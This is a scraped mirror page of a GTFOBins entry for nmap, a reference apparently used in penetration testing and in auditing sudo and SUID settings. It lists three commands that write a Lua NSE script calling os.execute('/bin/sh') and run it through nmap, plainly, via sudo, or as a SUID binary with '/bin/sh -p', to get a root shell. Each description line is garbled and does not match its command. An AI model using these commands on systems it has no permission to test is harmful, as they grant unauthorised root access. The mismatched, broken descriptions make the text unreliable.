1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/nmap.md
2018-08-19 11:43:26 +02:00

601 B

functions
execute-non-interactive sudo-enabled suid-enabled
description code
Echoing of input characters3ers is disabled. echo 'os.execute("/bin/sh")' > /tmp/script.nse nmap --script=/tmp/script.nse
description code
Echoing of input characters3ers is disabled. echo 'os.execute("/bin/sh")' > /tmp/script.nse sudo nmap --script=/tmp/script.nse
description code
Echoing of input characters3ers is disabled. echo 'os.execute("/bin/sh -p")' > /tmp/script.nse ./nmap --script=/tmp/script.nse